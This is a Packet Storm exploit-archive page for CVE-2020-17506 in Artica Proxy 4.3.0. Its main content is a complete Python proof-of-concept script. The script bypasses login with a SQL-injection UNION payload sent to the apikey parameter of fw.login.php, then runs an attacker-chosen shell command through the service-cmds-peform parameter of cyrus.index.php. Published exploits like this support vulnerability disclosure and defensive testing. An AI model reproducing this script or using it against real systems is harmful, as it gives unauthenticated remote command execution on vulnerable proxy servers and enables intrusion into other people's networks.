exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Artica Proxy 4.3.0 Authentication Bypass

Artica Proxy 4.3.0 Authentication Bypass
Posted Aug 14, 2020
Authored by Dan Duffy

Artica Proxy version 4.3.0 suffers from an authentication bypass vulnerability.

tags | exploit, bypass
advisories | CVE-2020-17506
SHA-256 | 3e28e53946121e8684f361f5280160ec92df78ad5b81e77ea2d01f9f26a906d1

Artica Proxy 4.3.0 Authentication Bypass

Change Mirror Download
# Exploit Title: Artica Proxy 4.3.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-08-13
# Exploit Author: Dan Duffy
# Vendor Homepage: http://articatech.net/
# Software Link: http://articatech.net/download2x.php?IsoOnly=yes
# Version: 4.30.00000000 (REQUIRED)
# Tested on: Debian
# CVE : CVE-2020-17506

import requests
import argparse
from bs4 import BeautifulSoup


def bypass_auth(session, args):
login_endpoint = "/fw.login.php?apikey="
payload = "%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"

print("[+] Bypassing authentication...")
session.get(args.host + login_endpoint + payload, verify=False)

return session


def run_command(session, args):
cmd_endpoint = "/cyrus.index.php?service-cmds-peform=||{}||".format(args.command)
print("[+] Running command: {}".format(args.command))
response = session.post(args.host + cmd_endpoint, verify=False)
soup = BeautifulSoup(response.text, "html.parser")
print(soup.find_all("code")[1].get_text())


def main():
parser = argparse.ArgumentParser(description="CVE-2020-17506 Artica PoC.")
parser.add_argument(
"--host", help="The host to target. Format example: https://host:port",
)
parser.add_argument("--command", help="The command to run")

args = parser.parse_args()
if not args.host or not args.command:
parser.print_help()
exit(0)
session = requests.Session()
session = bypass_auth(session, args)

run_command(session, args)


if __name__ == "__main__":
main()
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    50 Files
  • 15
    Aug 15th
    33 Files
  • 16
    Aug 16th
    23 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    43 Files
  • 20
    Aug 20th
    29 Files
  • 21
    Aug 21st
    42 Files
  • 22
    Aug 22nd
    26 Files
  • 23
    Aug 23rd
    25 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close